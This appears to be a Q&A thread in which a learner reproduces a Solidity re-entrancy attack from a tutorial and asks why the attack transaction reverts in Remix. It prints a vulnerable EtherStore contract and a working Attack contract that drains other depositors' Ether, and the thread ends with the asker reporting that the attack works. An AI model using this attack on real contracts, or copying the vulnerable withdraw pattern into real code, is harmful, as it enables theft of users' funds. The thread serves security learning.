# How to fix this error for re-entrancy attack : The called function should be payable if you send value and the value you send should be less than

Tags: solidity

I'm following a tutorial on youtube about Re-Entrancy attacks to understand security.

I've created two contracts in seperated files using remix :

```
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.10;

    contract EtherStore {
        mapping(address => uint) public balances;
    
        function deposit() public payable {
            balances[msg.sender] += msg.value;
        }
    
        function withdraw() public {
            uint bal = balances[msg.sender];
            require(bal > 0);
    
            (bool sent, ) = msg.sender.call{value: bal}("");
            require(sent, "Failed to send Ether");
    
            balances[msg.sender] = 0;
        }
    
        // Helper function to check the balance of this contract
        function getBalance() public view returns (uint) {
            return address(this).balance;
        }
    }

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.10;

import "./EtherStore.sol";
    contract Attack {
        EtherStore public etherStore;
    
        constructor(address _etherStoreAddress) {
            etherStore = EtherStore(_etherStoreAddress);
        }
    
        // Fallback is called when EtherStore sends Ether to this contract.
        fallback() external payable {
            if (address(etherStore).balance >= 1 ether) {
                etherStore.withdraw();
            }
        }

       
        function attack() external payable {
            require(msg.value >= 1 ether);
            etherStore.deposit{value: 1 ether}();
            etherStore.withdraw();
        }
    
        // Helper function to check the balance of this contract
        function getBalance() public view returns (uint) {
            return address(this).balance;
        }
    }
```

First I deployed EtherStore, I send 2 ethers from different accounts Alice & Bob.
I deployed the Attack contract with the address of EtherStore.
Then with another Account that I deployed the Attack contract with, I entered 1 ether and click on the attack function to get the 2 ether of Alice & bob.

The error that I got is this one :

***The transaction has been reverted to the initial state.
Note: The called function should be payable if you send value and the value you send should be less than your current balance.
Debug the transaction to get more information.***

This is the code from the tutorial:
https://solidity-by-example.org/hacks/re-entrancy/

What do you think?

Answer (score 0, accepted):

`receive()` has priority over `fallback()`.
You have both of them in your contract so the `receive` will be called and not the `fallback`.

And there is no reason for it to fail if it does nothing and its `payable` so my guess is maybe you complied the code in remix but you forgot to deploy it again and you called the `attack` on an old implementation.

Comment: The reason why I added receive() is that the compiler gave me an error that there is a fallback() function but there is no receive() function? it is normal

Comment: Are you sure it was an error? it is usually a warning you can ignore

Comment: I just remove the receive function and I deployed the attack contract but when I click on the attack function it gives me the same error as I mentioned above, Even though I refreshed the page I complied the contracts again

Comment: Compiling the contracts isn't enough. you need to deploy them again, make sure you delete the old deployed contracts (you have a little trash can icon button) and then deploy them

Comment: Yes, I tried that too but the problem persisted until I debugged it and I removed the "ether" keyword next to 1 in the attack function and fallback function, finally It works. Thanks for you time